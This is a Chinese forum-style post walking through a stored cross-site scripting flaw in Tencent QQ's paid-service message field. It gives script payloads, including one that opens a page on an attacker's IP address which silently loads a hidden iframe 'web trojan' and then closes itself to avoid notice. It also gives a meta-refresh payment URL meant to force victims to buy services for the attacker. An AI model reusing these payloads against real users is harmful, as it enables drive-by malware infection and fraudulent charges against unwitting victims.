这阶段跨站闹的很凶..QQ也接连出了几个跨站漏洞..这不.QQ业务也出了跨站漏洞..经过测试
不论是QQ会员,黄钻贵族,QQ炫铃.等..都可以跨站..
这个漏洞也不是我发现的..是我的好友netshow告诉我的..听他说也是经过玄猫指点..所以在这里也要感谢玄猫

..又为我们带来了一经典之作..
具体危害和玄猫写过的一篇"QQ跨站漏洞巧利用强迫他人为你购买QQ秀"差不多..只是这个是用来购买腾讯服务

的...这个危害比那个还要大...如果你的QQ币足够支付的话.

首先我们来看一下这个漏洞.
首先进入
http://my.qq.com/
打开业务列表..随便点个业务把..在"索要留言"里写代码:<script>alert('fhod');</script>
这时候对方QQ会出现系统提示..图1..

这里我们的留言很明显就被对方看到了..所以我们在留言的时候最好在前

面写一段话....然后后面在写<script>alert('fhod');</script>

然后对方查看的时候就会在浏览器上弹出一个内容为"fhod"的对话框.图2

那我们能不能利用它来做些什么呢?其实这个漏洞是完全可以让对方给你购买服务的..前提是只要对方查看了..

不过我对脚本不是很懂,.所以没做深入研究..我想只要把玄猫的那个看懂了..就可以举一反三..彻底的利用这

个漏洞..

我简单说下我怎么做的把
测试的时候在留言处写<iframe>进行挂马是行不通的..我写了
<iframe src=http://218.xx.xx.xxx/kz.htm  width=0 height=0></iframe>

然后查看接受的代码就成了

                          <td>QQ炫铃服务费用：</td>
                          </tr>
                         <tr>
                          <td>预支付
                            <input type="text" name="textfield" size="2" maxlength="2"

class="border" value="1" onfocus="javascript:SetFee_give();">
                            个月，总金额为:<font color="#FF0000">
                            <input label name="total_fee" size="3"

maxlength="3" style="border:#ffffff 1px solid">Q币</td>
                        </tr>
                        <tr><td><font color="#0000FF">您可以修改预支付的

月数。</font></td></tr>
                      </table>
                      <table width="330" border="0" cellspacing="5" cellpadding="0">
                        <tr>
                          <td style="width: 300px; word-wrap: break-word"><font color="#FF0000">

他的留言：</font>试下这个<iframe src</td>
                        </tr>
很显然..腾讯给过滤了...

而用
<script>window.open("http://218.xx.xx.2xx/kz1.htm");</script>

就完全可以执行成功....然后我们可以在kz1.htm里写这么一段代码

<iframe src=http://218.xx.xx.xxx/kz.htm  width=0 height=0></iframe>

<script>window.opener=top; window.close();</script>

上面那个http://218.xx.xx.xxx/kz.htm  是我们的网页木马地址/..具体什么马视个人需要而定

<script>window.opener=top; window.close();</script>
打开此页面就即刻关闭窗口..起隐蔽的作用

或者在一个HTM页面写如以下代码
<meta http-equiv="Refresh" content="0; URL=http://paycenter.qq.com/cgi-bin/paypresent.cgi?service_type=club&subtype=1&month=1&uin1=1988415&uin2=1988415&leaveword=123">

上面代码意思是给1988415这个号购买一个月的服务..留言是123在网上看到的以前老方法..自己试了下出现登陆的页面...可能腾讯已经修改了这个漏洞把..有兴趣可以试下.

我暂时就研究这么多.这几天累死了....抽空继续研究下..先发出来..大家有兴趣的欢迎继续研究..有了成果记的与我分享!!